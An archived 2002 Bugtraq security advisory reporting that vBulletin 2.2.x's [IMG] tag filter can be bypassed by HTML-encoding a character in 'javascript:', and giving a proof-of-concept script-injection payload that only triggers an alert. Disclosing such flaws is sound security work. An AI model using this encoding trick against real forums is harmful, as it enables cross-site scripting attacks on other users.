Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

[IMG] tag vulnerability in vBulletin

From: frog frog <leseulfrog () hotmail com>
Date: 22 Mar 2002 22:56:43 -0000


product :
vbulletin

versions :
2.2.2, 2.2.0 , maybe others.

Probleme :

One knows that if one sendings this code in private 
message : 
[IMG]javascript:alert('hum');[/IMG]
a space will be placed between "java" and "script". 

This filter can be by-passed :
[IMG]javas&#99;ript:alert('hop');[/IMG]

More details in french : 
http://www.ifrance.com/kitetoua/tuto/vBulletin.txt

Translated by google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FvBulletin.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools

frog-m@n
Previous By Date Next
Previous By Thread Next

Current thread: